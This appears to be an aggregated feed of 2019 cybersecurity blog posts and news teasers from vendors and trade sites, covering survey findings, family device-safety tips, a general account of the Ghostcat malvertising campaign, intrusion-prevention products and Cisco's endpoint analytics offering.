Very few other organizations had a more action-packed decade than Facebook. As a social media behemoth, Mark Zuckerberg’s company rose to dizzying heights before being engulfed in scandals which caused it to be viewed with suspicion. The lesson from this debacle is clear – there is now a renewed awareness of the importance of the data users provide to enterprises. Don’t expect this trend to subside any time soon – enterprises will have to deal with more questions on how exactly and what exactly they are doing with the data they collect.

The race towards automation as a tool to prevent cyber attacks

Automation is already being explored as a tool to combat cyber attacks. A 2019 Ponemon survey observed that 79% of respondents from 1,400 IT and IT security practitioners across the UK, US and APAC were in organizations which currently used or planned to use automation within the next three years. These respondents also said that log analysis would be the most common type of security activity that would be automated in the next three years, followed by malware analysis and threat hunting.

Automation will help reduce the load on an Information Security team which is already suffering from skill shortage and help enable the fulfilment of time-consuming, manual and mundane tasks.

Artificial Intelligence – in attack and defence

Artificial intelligence will be a double-edged sword in 2020 and beyond. AI-powered cybersecurity solutions in coordination with human intelligence will continue to be extremely useful when dealing with large amounts of data. AI solutions can analyze this data to find patterns and anomalies, helping to understand the environment. This way, it can understand concepts such as normalcy and false positives and flag when there are events which are not “normal”.

In the same vein though, the usage of AI in launching cyber attacks will also increase. Cybercriminals also use AI to run their own research and find loopholes in enterprises. Cybercriminals can also use AI to scan through huge tracts of data quickly and find Personally Identifiable Information (PII) which can be a major cybersecurity risk.

The year 2020 promises to mark a paradigm shift in the world of cybersecurity, giving rise to new solutions, new threats and new means of tackling them.

To share actionable insights on Cybersecurity at the dawn of 2020, Seqrite has put together an exclusive summit for knowledge sharing on the future of Cybersecurity.

The post 2020: A new paradigm in Cybersecurity appeared first on Seqrite Blog.

NCSAM: It’s Everyone’s Job to Ensure Online Safety at Work

October is National Cyber Security Awareness Month (NCSAM). NCSAM is a great initiative to help educate and inform our friends and family on the importance of taking your digital security seriously. To help continue to support this initiative, we asked a range of industry experts to share some of their tips to help us stay […]… Read More

The post NCSAM: It’s Everyone’s Job to Ensure Online Safety at Work appeared first on The State of Security.

Cloud-native applications need a unified continuous security approach

Cloud-native has arrived and now, it’s taking over. By 2021, 92% of companies will go cloud-native. It’s faster, it’s more efficient, more scalable, and more flexible. But is it more secure? As businesses integrate cloud-native technologies, such as Kubernetes, across their clouds, the complexity and distributed nature of these platforms increasingly require companies to rethink their approach not only to Dev and Ops, but also, security. The primary cloud platforms – AWS, Azure and Google … More

The post Cloud-native applications need a unified continuous security approach appeared first on Help Net Security.

Consumers have concerns about cybersecurity, value education on best practices

Nearly three-quarters of consumers (74%) would be likely to participate in a cybersecurity awareness or education program from their financial institution if they offered it. The survey conducted by The Harris Poll on behalf of Computer Services also found that an overwhelming majority of consumers (92%) have concerns about the security of their personal confidential data online. The poll ran online July 1-3, 2019, and it represents feedback from more than 2,000 U.S. adults ages … More

The post Consumers have concerns about cybersecurity, value education on best practices appeared first on Help Net Security.

The top 10 strategic government technology trends CIOs should plan for

The top 10 government technology trends for 2019-2020 that have the potential to optimize or transform public services have been identified by Gartner. Government CIOs should include these trends in their strategic planning over the next 12 to 18 months. The top 10 strategic technology trends for government were selected in response to pressing public policy goals and business needs of government organizations in jurisdictions around the globe. They fit into a broader set of … More

The post The top 10 strategic government technology trends CIOs should plan for appeared first on Help Net Security.

64% of IT decision makers have reported a breach in their ERP systems in the past 24 months

ERP applications are ‘critical’ to business operations, according to the IDC survey of 430 IT decision makers. ERP-related breach Sixty-four percent of the 191 decision makers surveyed whose organizations rely on SAP or Oracle E-Business Suite confirmed that their deployments have had an ERP-related breach in the last 24 months. “Enterprise Resource Planning (ERP) applications such as Oracle E-Business Suite and SAP (ECC) can be foundational for businesses. A breach of such critical ERP applications … More

The post 64% of IT decision makers have reported a breach in their ERP systems in the past 24 months appeared first on Help Net Security.

Device & App Safety Guide for Families

app safetyWhile we talk about online safety each week on this blog, October is National Cybersecurity Awareness Month (NCSAM), a time to come together and turn up the volume on the digital safety and security conversation worldwide.

To kick off that effort, here’s a comprehensive Device and App Safety Guide to give your family quick ways to boost safety and security.

Device Safety Tips

  • Update devices. Updates play a critical role in protecting family devices from hackers and malware, so check for updates and install promptly.
  • Disable geotagging. To keep photo data private, turn off geotagging, which is a code that embeds location information into digital photos.
  • Turn off location services. To safeguard personal activity from apps, turn off location services on all devices and within the app. 
  • Review phone records. Monitor your child’s cell phone records for unknown numbers or excessive late-night texting or calls.
  • Lock devices. Most every phone comes with a passcode, facial, or fingerprint lock. Make locking devices a habit and don’t share passcodes with friends. 
  • Add ICE to contacts. Make sure to put a parent’s name followed by ICE (in case of emergency) into each child’s contact list.
  • Back up data. To secure family photos and prevent data loss due to malware, viruses, or theft, regularly back up family data. 
  • Use strong passwords. Passwords should be more than eight characters in length and contain a mix of capital and lower case letters and at least one numeric or non-alphabetical character. Also, use two-factor authentication whenever possible.  
  • Stop spying. Adopting healthy online habits takes a full-court family press, so choose to equip over spying. Talk candidly about online risks, solutions, family ground rules, and consequences. If you monitor devices, make sure your child understands why. 
  • Share wisely. Discuss the risks of sharing photos online with your kids and the effect it has on reputation now and in the future. 
  • Protect your devices. Add an extra layer of protection to family devices with anti-virus and malware protection and consider content filtering
  • Secure IoT devices. IoT devices such as smart TVs, toys, smart speakers, and wearables are also part of the devices families need to safeguard. Configure privacy settings, read product reviews, secure your router, use a firewall, and use strong passwords at all connection points. 

App Safety Tips

  • Evaluate apps. Apps have been known to put malware on devices, spy, grab data illegally, and track location and purchasing data without permission. Check app reviews for potential dangers and respect app age requirements.app safety
  • Max privacy settings. Always choose the least amount of data-sharing possible within every app and make app profiles private.
  • Explore apps together. Learn about your child’s favorite apps, what the risks are, and how to adjust app settings to make them as safe as possible. Look at the apps on your child’s phone. Also, ask your child questions about his or her favorite apps and download and explore the app yourself. 
  • Understand app cultures. Some of the most popular social networking apps can also contain inappropriate content that promotes pornography, hate, racism, violence, cruelty, self-harm, or even terrorism.
  • Monitor gaming. Many games allow real-time in-game messaging. Players can chat using text, audio, and video, which presents the same potential safety concerns as other social and messaging apps.
  • Discuss app risks. New, popular apps come out every week. Discuss risks such as anonymous bullying, inappropriate content, sexting, fake profiles, and data stealing. 
  • Avoid anonymous apps. Dozens of apps allow users to create anonymous profiles. Avoid these apps and the inherent cyberbullying risks they pose.
  • Limit your digital circle. Only accept friend requests from people you know. And remember, “friends” aren’t always who they say they are. Review and reduce your friend list regularly.
  • Monitor in-app purchases. It’s easy for kids to go overboard with in-app purchases, especially on gaming apps.

Our biggest tip? Keep on talking. Talk about the risks inherent to the internet. Talk about personal situations that arise. Talk about mistakes. Nurturing honest, ongoing family dialogue takes time and effort but the payoff is knowing your kids can handle any situation they encounter online.

Stay tuned throughout October for more NCSAM highlights and information designed to help you keep your family safe and secure in the online world.

The post Device & App Safety Guide for Families appeared first on McAfee Blogs.

Is Your Browser Haunted With Ghostcat Malware?

October is finally among us, and things are spookier than usual. One ghost causing some hocus pocus across the World Wide Web is Ghostcat-3PC, a browser-hijacking malware that has launched at least 18 different malvertising campaigns in the last three months. According to SC Magazine, Ghostcat’s goal is to hijack users’ mobile browsing sessions and is specifically targeting website visitors in the U.S. and Europe.

How exactly does this ghost begin its haunting? The infection begins when a user visits a particular website and is served a malicious advertisement. When this occurs, Ghostcat fingerprints the browser, which is when information is collected about a device for the purpose of identification, to determine if the ad is running on a genuine webpage. Ghostcat also checks if the ad is running on one of the over 100 online publishers’ pages that have been specifically targeted by this campaign. If both of these conditions are met, then the malware serves a malicious URL linked to the ad.

From there, this malicious URL delivers obfuscated JavaScript, which creates an obscure source or machine code. The attackers behind Ghostcat use this technique to trick the publishers’ ad blockers, preventing them from detecting malicious content. The code also checks for additional conditions necessary for the attack. These conditions include ensuring that the malware is being run on a mobile device and a mobile-specific browser, that the device is located in a targeted country, and that it is being run on a genuine website as opposed to a testing environment. If the malware concludes that the browsing environment fits the descriptions of their target, then it will serve a fraudulent pop-up, leading the user to malicious content.

So, what are some proactive steps users can take to avoid being haunted by Ghostcat? Follow these tips to avoid the malware’s hocus pocus:

  • Watch what you click. Avoid clicking on unknown links or suspicious pop-ups, especially those that come from someone you don’t know.
  • Be selective about which sites you visit. Only use well-known and trusted sites. One way to determine if a site is potentially malicious is by checking its URL. If the URL address contains multiple grammar or spelling errors and suspicious characters, avoid interacting with the site altogether.
  • Surf the web safely. You can use a tool like McAfee WebAdvisor, which will flag any sites that may be malicious without your knowing.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Is Your Browser Haunted With Ghostcat Malware? appeared first on McAfee Blogs.

Using CESA to Solve Endpoint Blindness for a World Class InfoSec Team

Cisco has an amazing set of products like AMP for Endpoints and Cisco Umbrella protecting devices from advanced malware threats.  There were other user and endpoint scenarios that remained unsolved until we introduced the new Cisco Endpoint Security Analytics (CESA) solution that was recently announced.  CESA provides an unprecedented level of endpoint and user networking visibility built on Cisco AnyConnect Network Visibility Module (NVM) endpoint telemetry and Splunk Enterprise.   Underlying the NVM technology is a protocol called nvzFlow (en-vizzy-flow) that I have blogged about in the past.

 

Why Did We Build CESA?

The CESA solution was originally developed by the Office of the Security CTO and then integrated into Cisco AnyConnect and Splunk products to solve a set of issues for Cisco InfoSec.  Cisco InfoSec realized that getting all the endpoint visibility they needed to perform incident response was a challenge. There were also endpoint security blind spots as more Cisco employees were working off premise and connecting to both enterprise and cloud resources.  They needed a way to collect and store a year of data for analysis of incidents while also getting information in real‑time to see what is happening in the network.  You can read more about the Cisco InfoSec use case in their case study on CESA.

The Office of the Security CTO looks at current and future customer problems that are not being solved by existing technology and then come up with ideas on how to solve them.  My fellow co-inventors, Andrew Zawadowskiy and Donovan O’Hara from the CTO Advanced Development team built the initial Proof of Concept and then worked on the final product release with the AnyConnect development team.

As we thought about ways to solve the problems Cisco InfoSec was facing, we wanted to do it in a way that built on standards technology so that not only could Cisco Stealtwatch and Cisco Tetration support it, but also provide an ecosystem for key partners to participate.  This is why we chose to build on IPFIX.  It is the perfect protocol to build the enhanced  context found in nvzFlow.  What do we mean by “Enhanced Context”?

The 5 key endpoint visibility categories conveyed by the protocol or “Enhanced Context” are:

  • User
  • Device
  • Application
  • Location
  • Destination

At the end of the blog will be a helpful table to show you details of the enhanced context that is provided.

Working with Great Partners like Splunk and Samsung

One of the key features of CESA is Splunk Enterprise, which performs the analytics and alerting on the NVM telemetry, turning it into actionable events. The new CESA Built on Splunk product, available exclusively from Cisco, provides a Splunk package customized and priced specifically for analyzing NVM telemetry.  Cisco InfoSec has been using the CESA solution for over two years now.  As noted earlier, you can read more about it in their Case Study.

Spunk Enterprise is a fantastic tool.  It was really easy for us to take the Cisco AnyConnect NVM data and not only import it into Splunk, but to also quickly create a high value set of dashboards and reports from the data.   There are two components in the Splunk store that make up the solution: Cisco AnyConnect Network Visibility Module (NVM) App for Splunk and Cisco NVM Technology Add-on for Splunk.  Because NVM produces so much high value data, Splunk created a special per-endpoint license available exclusively from Cisco that makes budgeting predictable and saves you money.  We also put together a helpful deployment guide to get you going.

Below is an example of the dozens of reports available in the AnyConnect NVM Splunk Dashboard.
As you can see the solution provides visibility into what applications are connecting to what domains and how much data is being transmitted/received.

 

 

From there, you can then drill down on the specific application and obtain finer grained details including the SHA256 hash of the process, the names of domains and IP addresses it connected to, what account it is running under, etc.  Just click on the specific element and it will take you to an investigation page for that observable.

You can easily integrate your favorite investigation tools right into the Splunk Enterprise dashboards.  For example, you can pivot from a DNS domain name observable into Cisco Umbrella, Talos Intelligence or Cisco Threat Response with just a couple lines of HTML.  This will allow you to obtain a threat disposition on the domain.

Similarly, you can take the SHA256 hash observable and pivot right into AMP for Endpoints, ThreatGrid or Cisco Threat Response.  This will allow you to obtain a threat disposition on the binary.

We’ve provided those integrations for you in the default dashboards. You can easily add more just by editing them to include your favorite tools.  Let us know if there is anything else that would be useful in the default screens.

 

Samsung has been another excellent partner from the start.  We have worked with them closely on their Knox program for a number of years with AnyConnect integrations and neat features like per-app VPN.  When we explained to them what we wanted to do with Cisco AnyConnect NVM, they were excited to help and developed the Network Platform Analytics (NPA) framework to make it possible.  It is the only framework available on mobile platforms to support Cisco AnyConnect NVM.  The best part is that you can enable and provision this capability using your favorite Enterprise Mobility Management (EMM) solution – no special device-mode needed!  Keep an eye out for a forthcoming quick‑start guide on this technology.  NVM is also available on Windows, MacOS and Linux platforms.

Those are some of the high points of the CESA Built on Splunk solution.  If you’d like to get into further technical details on the solution architecture and NVM telemetry itself, see my post on our Cisco Community Page.

October 2019 Patch Tuesday forecast: Be sure to apply service stack updates

School is back in session across most of the world, and here in the United States most students look forward to a school holiday called ‘fall break.’ While we never have a Patch Tuesday off, this may actually be a bit of fall break for most us because I don’t anticipate many updates this month. Before we get into the forecast details, I’d like to provide some information around service stack updates (SSUs) and how … More

The post October 2019 Patch Tuesday forecast: Be sure to apply service stack updates appeared first on Help Net Security.

Effective methods for enterprises to detect and prevent network intrusions

Estimated reading time: 2 minutes

Enterprise networks are susceptible to brutal intrusions – some of these intrusions could be in the form of systems on the network running unauthorized applications with vulnerabilities and backdoors. When such vulnerabilities are exploited, unsolicited access to the network occurs which can have a range of unpleasant consequences for businesses.

To prevent such unauthorized intrusions on the network, it is essential to deploy a security solution which can detect these events and work actively towards prevention. An Intrusion Detection System (IDS) monitors all incoming and outgoing network activity and identifies any signs of intrusion in your systems that could jeopardize your business. Its main function is to raise an alert when it discovers any such activity and hence it is commonly known as a passive monitoring system.

Nowadays, IDS systems have received a facelift. We now have an advanced solution viz. IPS that is helping enterprises in a huge way to cope up with the menace of cyber-attacks that happen through business networks.

IPS is part of and a salient feature of Unified Threat Management (UTM), a highly effective product to block threats penetrating via business networks.

What are IPS and how does it help in the prevention of network intrusions?

An Intrusion Prevention System (IPS) is a step ahead of IDS with its capabilities. The system detects and blocks anomalies on a company’s network. It does that through:

  • Monitoring routers, firewalls, key servers and files and matching intrusions with a signature database in the event of a breach
  • Raising an alarm with targeted notifications at key personnel when there is a breach
  • The number of false alarms is low because of the cross-verification with a signature database
  • Detecting patterns by identifying various types of attacks and providing insights on administrators for further protection
  • Maintaining regulatory compliance by providing greater visibility across the entire network

How does UTM as a whole help in defending your business network?

Seqrite’s Unified Threat Management (UTM) offers a one-stop solution for all enterprise security needs which includes intrusion detection and prevention as a standard feature.

UTM’s in-built IDS and IPS components keep enterprises safe by:

  • Monitoring, evaluating and catching threats in real-time
  • Preventing Denial of Service (DoS)/Distributed Denial of Service (DDoS) attacks
  • Preventing the discovery of open ports by attackers

Seqrite UTM’s IPS acts as a security barrier against unwanted intrusions into your network and forestalls a broad range of DoS and DDoS attacks before they penetrate the network. Deploying this level of protection can benefit an enterprise in various ways, including:

  • Providing a snapshot of network security at one glance
  • Protection of enterprise assets within the network
  • Triggers raised on detection of any suspected breach or activity in the network
  • A holistic approach towards prevention of intrusions

Apart from its powerful Intrusion Prevention System, Seqrite’s Unified Threat Management (UTM) solution is equipped with other key features like Gateway Antivirus, Web Filtering, High Availability, Centralized Management System (CMS), etc. to ensure it acts as the first line of defence against all network attacks.

The post Effective methods for enterprises to detect and prevent network intrusions appeared first on Seqrite Blog.

Enterprises leaving themselves vulnerable to cyberattacks by failing to prioritize PKI security

IoT is one of the fastest growing trends in technology today, yet enterprises are leaving themselves vulnerable to dangerous cyberattacks by failing to prioritize PKI security, according to new research from nCipher Security. The 2019 Global PKI and IoT Trends Study, conducted by research firm the Ponemon Institute and sponsored by nCipher Security, is based on feedback from more than 1,800 IT security practitioners in 14 countries/regions. The study found that IoT is the fastest-growing … More

The post Enterprises leaving themselves vulnerable to cyberattacks by failing to prioritize PKI security appeared first on Help Net Security.

Being compliant with laws and regulations is not a guarantee against data breaches

Compliance is not a guarantee against data breaches. These are the results of the Advisera survey carried out with 605 respondents, coming from countries on five continents, from various industries, mostly from smaller and medium-size companies, and acting predominantly in IT and security positions. Security and compliance are tightly related Nearly 85% of respondents consider security and compliance to be highly related and feel that they need to be implemented together. “This perception of respondents … More

The post Being compliant with laws and regulations is not a guarantee against data breaches appeared first on Help Net Security.

Measuring the Security of IoT Devices

In August, CyberITL completed a large-scale survey of software security practices in the IoT environment, by looking at the compiled software.

Data Collected:

  • 22 Vendors
  • 1,294 Products
  • 4,956 Firmware versions
  • 3,333,411 Binaries analyzed
  • Date range of data: 2003-03-24 to 2019-01-24 (varies by vendor, most up to 2018 releases)

[...]

This dataset contains products such as home routers, enterprise equipment, smart cameras, security devices, and more. It represents a wide range of either found in the home, enterprise or government deployments.

Vendors are Asus, Belkin, DLink, Linksys, Moxa, Tenda, Trendnet, and Ubiquiti.

CyberITL's methodology is not source code analysis. They look at the actual firmware. And they don't look for vulnerabilities; they look for secure coding practices that indicate that the company is taking security seriously, and whose lack pretty much guarantees that there will be vulnerabilities. These include address space layout randomization and stack guards.

A summary of their results.

CITL identified a number of important takeaways from this study:

  • On average, updates were more likely to remove hardening features than add them.
  • Within our 15 year data set, there have been no positive trends from any one vendor.
  • MIPS is both the most common CPU architecture and least hardened on average.
  • There are a large number of duplicate binaries across multiple vendors, indicating a common build system or toolchain.

Their website contains the raw data.

Chapter Preview: Birth to Age 2 – First Footprints

When your baby is on the way, their privacy and digital security is probably the last thing you have on your mind. At least it’s way down there on the list—of course it is! You’re preparing for a bright, joyous addition to your family and home. Everything you’re doing is intended to create an environment that is safe and comfortable, so your baby knows a warm and loving world right from the start. Not to mention, you and your family are anticipating how much you’ll enjoy these milestones.

Part of the enjoyment includes sharing these moments, which is mainly done online these days. (When’s the last time you took a picture on film and had it printed?) From digital invitations, to baby showers, and ultrasound pictures posted on social media—the weeks and months leading up to birth are a celebration as well. And that’s where your baby’s data lake gets its initial drops. Your posts on social media make up the first little digital streams feeding their data lake, along with anything else you share about them online.

When my children were babies we spent a lot of time “baby proofing” the house. You know, putting special locks on the kitchen cabinets, plastic covers on electrical outlets, baby gates, and more. Today that behavior needs to extend online. We need to be the guardians of our baby’s privacy, identity, and security until they get to the age where they understand what’s at risk and can protect themselves.


No doubt you will want to share all those precious moments as your bundle of joy fills your life with happiness, despite the possible risks. With that in mind, there’s an entire chapter in “Is Your Digital Front Door Unlocked?” dedicated to your baby’s first steps online, offering suggestions on what constitutes a healthy balance of what should and should not be shared. It also looks at other important considerations that you may not have thought of, such as getting your baby a Web address and monitoring their identity to make sure an identify thief hasn’t hijacked it—plenty of things many parents wouldn’t think of, but should, given the way our world works today.

Gary Davis’ book, Is Your Digital Front Door Unlocked?, is available September 5, 2019 and can be ordered at amazon.com.

The post Chapter Preview: Birth to Age 2 – First Footprints appeared first on McAfee Blogs.

Good cybersecurity comes from focusing on the right things, but what are they?

“There is no wrong way into the security field and it’s never too late to make a career switch that will take you there,” says Mark Orlando, CTO at Raytheon Cyber Protection Solutions. If you think that’s easy for him to say, consider his education and employment twists and turns before getting into technology and, ultimately, into cybersecurity: he was an art and design student, then a Marine, and later an UPS truck loader. While … More

The post Good cybersecurity comes from focusing on the right things, but what are they? appeared first on Help Net Security.

How security programs and breach history influence company valuations

96% of cybersecurity professionals indicated that cybersecurity readiness factors into the calculation when they are assessing the overall monetary value of a potential acquisition target, a (ISC)2 survey reveals. (ISC)2 surveyed 250 U.S.-based professionals with mergers and acquisitions (M&A) expertise. Survey respondents unanimously agreed that cybersecurity audits are not only commonplace but are actually standard practice during M&A transaction preparation. The research also found that the results of such due diligence can have a tangible … More

The post How security programs and breach history influence company valuations appeared first on Help Net Security.

Executives have to make cybersecurity a priority in order to secure their business

Businesses and organizations of all sizes have steadily begun to recognize the importance of cybersecurity to their success. As spending and awareness of the importance of cybersecurity increases, so does the demand for intelligence about how best to spend those funds and what security leaders can expect in today’s constantly evolving attack surfaces. To help give business leaders insight into the threat landscape to better mitigate risk, Optiv Security has published its 2019 Cyber Threat … More

The post Executives have to make cybersecurity a priority in order to secure their business appeared first on Help Net Security.

Security and compliance gaps of ineffective employee onboarding and offboarding

There are significant gaps in the compliant management of employee resources throughout the employment lifecycle. Just 15% of employees have all the resources they require to be productive on day one, further, more than half (52%) of IT professionals know someone who still has access to a former employer’s applications and data, according to Ivanti. When it comes to employee onboarding, 38% of IT professionals report it takes between two and four days to get … More

The post Security and compliance gaps of ineffective employee onboarding and offboarding appeared first on Help Net Security.

The 5 biggest examples of executive threats and how to prevent them

Many executives focus their security efforts and budgets solely on physical threats, but attacks targeting an executive’s digital presence can be just as dangerous. Criminals are looking to exploit the wealth of high-profile and high net-worth individuals—or cause them embarrassment or personal harm—at an unprecedented rate. And, as the most abundant source of company secrets and IP, they’re a primary attack vector of their businesses too. Attacks on VIPs involve attempts at accessing their sensitive … More

The post The 5 biggest examples of executive threats and how to prevent them appeared first on Help Net Security.

49% of infosec pros are awake at night worrying about their organization’s cybersecurity

Six in every ten businesses have experienced a breach in either in the last three years. At least a third of infosec professionals (36%) whose employers had not recently been a victim of a cyber attack also believe that it is likely that they are currently facing one without knowing about it. This may be an indicator of a bumper year for breaches, as the total number of organizations reporting breaches in 2018 only came … More

The post 49% of infosec pros are awake at night worrying about their organization’s cybersecurity appeared first on Help Net Security.

Massive uptick in eCrime campaigns, retail among top targeted industries

There has been a massive uptick in eCrime cyber activity, a CrowdStrike report reveals. As Gartner states in the 2019 Magic Quadrant for Endpoint Protection Platform, “The skills requirement of EDR solutions compounded by the skills gap in most organizations is an impediment to the adoption of EDR in the mainstream market. “As a result, product vendors are increasingly offering a fusion of products and services ranging from light incident response and monitoring through full … More

The post Massive uptick in eCrime campaigns, retail among top targeted industries appeared first on Help Net Security.

Aussies Fear Snakes, Spiders and Getting Hacked

Fears and phobias. We all have them. But what are your biggest ones? I absolutely detest snakes but spiders don’t worry me at all. Well, new research by McAfee shows that cybercriminals and the fear of being hacked are now the 5th greatest fear among Aussies.

With news of data breaches and hacking crusades filling our news feed on a regular basis, many of us are becoming more aware and concerned about the threats we face in our increasingly digital world. And McAfee’s latest confirms this with hackers making their way into Australia’s Top 10 Fears.

According to research conducted by McAfee, snakes are the top phobia for Aussies followed by spiders, heights and sharks. Cybercriminals and the fear of being hacked come in in 5th place beating the dentist, bees, ghosts, aeroplane travel and clowns!

Aussie Top 10 Fears and Phobias

  1. Snakes
  2. Spiders
  3. Heights
  4. Sharks
  5. Hackers/Cybercriminals
  6. The dentist
  7. Bees or wasps
  8. Ghosts
  9. Aeroplane travel
  10. Clowns

Why Do We Have Phobias?

Fears and phobias develop when we perceive that we are at risk of pain, or worse, still, death. And while almost a third of respondents nominated snakes as their number one fear, there is less than one-in-fifty thousand chance of being bitten badly enough by a snake to warrant going to hospital in Australia, according to research from the Internal Medicine Journal.

In contrast, McAfee’s analysis of more than 108 billion potential online threats between October and December 2018, identified 202 million of these threats as genuine risks. With a global population of 7.5 billion, that means there is approximately a one in 37 chance of being targeted by cybercrime. Now while this is not a life-threatening situation, these statistics show that chance of us being affected by an online threat is very real.

What Are Our Biggest Cyber Fears?

According to the research, 82% of Aussies believe that being hacked is a growing or high concern. And when you look at the sheer number of reported data breaches so far this year, these statistics make complete sense. Data breaches have affected Bunnings staff, Federal Parliament staff, Marriott guests, Victorian Government staff, QLD Fisheries members, Skoolbag app users and Big W customers plus many more.

Almost 1 in 5 (19%) of those interviewed said their top fear at work is doing something that will result in a data security breach, they will leak sensitive information or infect their corporate IT systems.

The fear that we are in the midst of a cyberwar is another big concern for many Aussies. Cyberwar can be explained as a computer or network-based conflict where parties try to disrupt or take ownership of the activities of other parties, often for strategic, military or cyberespionage purposes. 55% of Aussies believe that a cyberwar is happening right now but we just don’t know about it. And a fifth believe cyber warfare is the biggest threat to our nation.

What Can We Do to Address Our Fear of Being Hacked?

Being proactive about protecting your online life is the absolute best way of reducing the chances of being hacked or being affected by a data breach. Here are my top tips on what you can now to protect yourself:

  1. Be Savvy with Your Passwords

Using a password manager to create unique and complex passwords for each of your online accounts will definitely improve your online safety. If each on your online accounts has a unique password and you are involved in a breach, the hacker won’t be able to use the stolen password details to log into any of your other accounts.

  1. Stop AutoFill on Chrome

Storing your financial data within your browser and being able to populate online forms quickly within seconds makes the autofill function very attractive however it is risky. Autofill will automatically fill out all forms on a page regardless of whether you can see all the boxes. You may just think you are automatically entering your email address into an online form however a savvy hacker could easily design an online form with hidden boxes designed to capture your financial information. So remove all your financial information from Autofill. I know this means you will have to manually enter information each time you purchase but your personal data will be better protected.

  1. Think Before You Click

One of the easiest ways for a cybercriminal to compromise their victim is by using phishing emails to lure consumers into clicking links for products or services that could lead to malware, or a phoney website designed to steal personal information. If the deal seems too good to be true, or the email was not expected, always check directly with the source.

  1. Stay Protected While You Browse

It’s important to put the right security solutions in place in order to surf the web safely. Add an extra layer of security to your browser with McAfee WebAdvisor.

  1. Always Connect with Caution

I know public Wi-Fi might seem like a good idea, but if consumers are not careful, they could be unknowingly exposing personal information or credit card details to cybercriminals who are snooping on the network. If you are a regular Wi-Fi user, I recommend investing in a virtual private network or (VPN) such as McAfee’s Safe Connect which will ensure your connection is completely secure and that your data remains safe.

While it is tempting, putting our head in the sand and pretending hackers and cybercrime don’t exist puts ourselves and our families at even more risk! Facing our fears and making an action plan is the best way of reducing our worry and stress. So, please commit to being proactive about your family’s online security. Draw up a list of what you can do today to protect your tribe. And if you want to receive regular updates about additional ways you can keep your family safe online, check out my blog.

‘till next time.

Alex x

 

 

 

The post Aussies Fear Snakes, Spiders and Getting Hacked appeared first on McAfee Blogs.

Cyber risks are the top concern among businesses of all sizes

Cyber risks are the top concern among businesses of all sizes for the first time since the Travelers Companies’ survey began in 2014. Of the 1,200 business leaders who participated in the survey, 55% said they worry some or a great deal about cyber risks, ahead of medical cost inflation (54%), employee benefit costs (53%), the ability to attract and retain talent (46%) and legal liability (44%). As concerns about cyber threats have grown, a … More

The post Cyber risks are the top concern among businesses of all sizes appeared first on Help Net Security.

How Will the CMMC Impact My Business and How Can We Prepare? Part 3 of 3

Combining Cyber Standards – Is ‘Unified’ Always A Good Approach? The CMMC enforcement model will require a significant adjustment to the way contractors conduct government business – from procurement to execution. In Part 2 of this series, I discussed the possible impacts of having your company’s security rating made public. In Part 3, I would like […]… Read More

The post How Will the CMMC Impact My Business and How Can We Prepare? Part 3 of 3 appeared first on The State of Security.

Forrester names Microsoft a Leader in 2019 Endpoint Security Suites Wave

As we continue as a company to empower every person on the planet to achieve more, we keep delivering on our mission through products that achieve the highest recognition in the industry. For the last several years we’ve been working hard to provide the leading endpoint security product in the market.

Today, we are proud to announce that Microsoft is positioned as a leader in The Forrester Wave™: Endpoint Security Suites, Q3 2019, receiving among the second highest scores in both the strategy and market presence categories. According to Forrester, “Microsoft has a compelling vision for the future where endpoint threat prevention and detection are completely integrated and inseparable.”

We believe this latest recognition represents our ability to provide best-in-class protection and deliver on innovations that learn and evolve to keep pace with today’s threat landscape.

 

This recognition comes at a great point in our evolution journey. We are guided by a strong vision to provide the industry-best protection and we are committed to continue pushing the limits in protection, detection, and response capabilities to secure our customers.

Download this complimentary full report and read the analysis behind Microsoft’s positioning as a Leader.

For more information on our endpoint protection platform, or to sign up for a trial, visit our Microsoft Defender Advanced Threat Protection (ATP) page.

The Forrester Wave™: Endpoint Security Suites, Q3 2019, Chris Sherman, September 23, 2019.

This graphic was published by Forrester Research as part of a larger research document and should be evaluated in the context of the entire document. The Forrester document is available upon request from https://reprints.forrester.com/#/assets/2/108/RES146636/reports

 

 

The post Forrester names Microsoft a Leader in 2019 Endpoint Security Suites Wave appeared first on Microsoft Security.

Find What Your Endpoint Anti-Malware is Missing with CESA Built on Splunk

There are many aspects to securing an endpoint beyond finding the malware on it.  What do you know about the behavior of your endpoints? Can you track anomalous traffic? Can you tell what the applications and other software processes are up to?  What is happening when the device is off the corporate network? Has a user or device evaded endpoint security measures? With insight to such issues, you can generate visibility that not only follows endpoints on and off network, but also finds threats often not addressed by anti-malware solutions.

 

With this in mind, Cisco has created a solution unlike anything available in the industry today — Cisco Endpoint Security Analytics (CESA) Built on Splunk. This new solution brings together the unparalleled endpoint behavioral visibility of Cisco’s AnyConnect Network Visibility Module (NVM) and the data transformation power of the Splunk analytics platform. The result is an added layer of deep endpoint visibility that transforms endpoint-centric data into insights to proactively detect and mitigate network threats.

If you already use AnyConnect NVM, you know it creates a lot of detailed, endpoint-specific data. But by building and productizing CESA on top of Splunk, we’ve paired that data with an equally comprehensive and cost-effective analytics tool. CESA addresses endpoint security use cases such as:

  • Unapproved applications and SaaS visibility
  • Endpoint security evasion
  • Attribution of user to device to application to traffic and destination
  • Zero-trust monitoring
  • Data loss detection
  • Day-zero malware and threat hunting
  • Asset inventory

The behavioral data produced by NVM complements anti-malware agents like Cisco Advanced Malware Protection (AMP) for Endpoints that primarily focus on file analysis to detect malware on endpoints, which identifies known issues. But because CESA analyzes user and device behavior and identifies changes and anomalies, it enables threat hunters and analysts to discover malicious or suspicious endpoint activity, often without an additional endpoint agent. Where antivirus and other endpoint solutions would miss these threats, CESA provides early detection that increases security posture. CESA endpoint analytics also complements the broad network visbility provided by Cisco Stealthwatch by following endpoints on and off network, as well as enabling deep endpoint insight into down to the user account, device details and network interface levels of the endpoint.  Together CESA and Stealthwatch cover every aspect of network and endpoint behavior leaving no blind spot unchecked.  

How we address endpoint blindness

Even as security products continue to integrate, endpoint blindness is a persistent problem. Information security (infosec) teams need to know more about what is happening on the endpoints to anticipate where attacks are more likely to occur.

By leveraging the NVM telemetry that endpoints provide, we gain a better understanding of users’ network behaviors and where threats are going to happen. These insights can raise potential red flags like:

  • Are my endpoints suddenly communicating with domains we’ve not seen in our environment before?
  • Has a user changed behavior suddenly, using applications and visiting hosts they don’t usually access?
  • Does an endpoint have unusual traffic patterns? Is it uploading or downloading more than usual? Is someone hoarding or exfiltrating data?
  • Are any machines using unapproved applications or SaaS services?
  • Has security been disabled on an endpoint?
  • Which endpoints have known bad files or applications?
  • What are my users doing when they are not connected to my network?
